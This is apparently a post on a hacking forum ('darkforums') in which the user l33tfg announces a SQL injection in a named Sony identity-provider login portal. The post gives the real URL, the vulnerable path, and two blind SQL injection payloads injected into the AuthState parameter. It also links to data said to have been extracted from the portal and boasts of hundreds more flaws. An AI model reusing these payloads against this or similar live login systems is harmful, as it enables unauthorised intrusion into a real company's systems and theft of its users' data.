[l33tfg]

Hello darkforums community, today I found a SQL injection in a backend login portal for Sony, I also found the server the endpoint is being hosted on, and I have found possibly HUNDREDS of vulnerabilities I can show you with the outdated software it uses

The vulnerability is in this page:

https://idp.sel.sony.com/idp/module.php/...ervice.php?spentityid=https%3A%2F%2Fprod-pdp.sony.com%2F&cookieTime=1759084415 

the two vulnerabilities I found are here: 
### Strategy: Blind bin Method: GET Path: /idp/module.php/core/loginuserpass.php 
Query: AuthState=_db77880fa0f735eccf2c143ed0d31c668448bc0e2c:https://idp.sel.sony.com/idp/saml2/idp/SSOService.php?spentityid=https%3A%2F%2Fprod-pdp.sony.com%2F&cookieTime=1758743547+;select+1+where(<query>)--+-lz0H Header: Content-Type: text/plain ### 

Strategy: Blind bit Method: GET Path: /idp/module.php/core/loginuserpass.php 
Query: AuthState=_db77880fa0f735eccf2c143ed0d31c668448bc0e2c:https://idp.sel.sony.com/idp/saml2/idp/SSOService.php?spentityid=https%3A%2F%2Fprod-pdp.sony.com%2F&cookieTime=1758743547+;select+1+where(<query>)--+-AO1X Header: Content-Type: text/plain 

Here is all the binary bits I extracted from the login portal:  files.catbox.moe/vqrvu4.mp4